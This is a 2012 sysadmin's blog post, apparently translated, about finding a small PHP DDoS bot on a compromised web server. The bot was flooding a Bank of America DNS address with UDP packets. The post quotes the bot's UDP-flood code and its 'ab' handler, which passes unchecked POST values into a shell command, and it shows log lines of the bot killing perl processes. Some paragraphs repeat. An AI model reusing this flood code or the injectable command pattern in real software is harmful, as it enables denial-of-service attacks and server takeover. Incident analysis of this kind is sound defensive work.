January 13, 2012 at 15:25PHP DDOS bot walks around servers
Today, at about two in the morning, when I wanted to go to bed, one of my friends wrote to me on Skype. Last year, I helped him administer several of his servers. At such a late time, he wrote that the network interface of one of his servers is completely clogged, judging by the mrtg schedule. I looked, really, I couldn’t even reach ssh, the server was rebooted and the analysis of the situation began ...
After rebooting the server, after some time, the traffic appeared again. I launched iptraf, it showed a rather large number of UDP packets to one IP address - " 171.161.224.16 ", when I sobered it up in dns5.bankofamerica.com : everything fell into place, obviously there is a dDoS from the server.
Banned IP in iptables. I looked at top, one of the httpd processes ate 100% of cpu, set strace on it, I saw the same familiar address. Since there are no access_logs on the server, and error_logs were empty, I turned to the logs of the beautiful php module baxtep ( article on the hub), which writes to the log all attempts to execute any command through the php interpreter. I’ve done an RPM and always put it on wards servers, just in case. I used the naked eye to determine the name of the script you are looking for: the file code is available by reference , I found it in google from itsoknoproblembro line from the file, google has only one result, I thought freshly and decided to write about it in the hub
The file size is only 3kb, the code is not complicated. Key features of the bot:
I will dwell in more detail on DDoS.
The script receives the address of the target being attacked through the parameter, opens the UDP socket and, while the socket exists, sends requests to the 11th port. Moreover, it is interesting that in the data it passes its own address.
The question "Why?" Doesn't leave my head for 12 hours.
The second attack method is through the ab utility :
Moreover, there are no checks of incoming parameters and you can execute arbitrary commands on the server.
Earlier, I personally did not come across a UDP ddos on php, they didn’t fill us with this, google it - apparently people have been practicing with different sauces for a long time.
Analysis of the situation
After rebooting the server, after some time, the traffic appeared again. I launched iptraf, it showed a rather large number of UDP packets to one IP address - " 171.161.224.16 ", when I sobered it up in dns5.bankofamerica.com : everything fell into place, obviously there is a dDoS from the server.
Banned IP in iptables. I looked at top, one of the httpd processes ate 100% of cpu, set strace on it, I saw the same familiar address. Since there are no access_logs on the server, and error_logs were empty, I turned to the logs of the beautiful php module baxtep ( article on the hub), which writes to the log all attempts to execute any command through the php interpreter. I’ve done an RPM and always put it on wards servers, just in case. I used the naked eye to determine the name of the script you are looking for: the file code is available by reference , I found it in google from itsoknoproblembro line from the file, google has only one result, I thought freshly and decided to write about it in the hub
2012-01-12 22:46:33 BAXTEP: system CMDLINE: `killall -9 perl` FILE: /home/user/site/htdocs/dir/db/indx.php on line 19 URI: /dir/db/indx.php
2012-01-12 22:46:33 BAXTEP: system CMDLINE: `killall -9 perl-bin` FILE: /home/user/site/htdocs/dir/db/indx.php on line 19 URI: /dir/db/indx.php
2012-01-12 22:46:33 BAXTEP: system CMDLINE: `killall -9 perl-cgi` FILE: /home/user/site/htdocs/dir/db/indx.php on line 19 URI: /dir/db/indx.php
Code analysis
The file size is only 3kb, the code is not complicated. Key features of the bot:
- upload files to the server
- DDoS with a large number of UDP packets
- ddos through the ab utility
I will dwell in more detail on DDoS.
case "ust":
$page = curPageURL();
$ip = $_POST['ip'];
$port = "11";
$out = $page."\n";
$socket = stream_socket_client("udp://$ip:$port");
if ($socket) {
stream_set_write_buffer($socket, 0);
stream_socket_sendto($socket,$out);
}
fclose($socket);
break;
The script receives the address of the target being attacked through the parameter, opens the UDP socket and, while the socket exists, sends requests to the 11th port. Moreover, it is interesting that in the data it passes its own address.
function curPageURL(){
$pageURL = 'http';
if ($_SERVER["HTTPS"] == "on") {
$pageURL .= "s";
}
$pageURL .= "://";
if ($_SERVER["SERVER_PORT"] != "80") {
$pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
} else {
$pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
}
return $pageURL;
}
The question "Why?" Doesn't leave my head for 12 hours.
The second attack method is through the ab utility :
case "ab":
$url = $_POST['url'];
$c = $_POST['c'];
$n = $_POST['n'];
cmdexec("ab -c $c -n $n $url");
break;
Moreover, there are no checks of incoming parameters and you can execute arbitrary commands on the server.
Earlier, I personally did not come across a UDP ddos on php, they didn’t fill us with this, google it - apparently people have been practicing with different sauces for a long time.
conclusions
- As practice has shown, such a script easily clogs the entire available channel.
- The situation became a reality, since UDP was not paranoidly filtered on the server.
- Someone decided to put BOA :)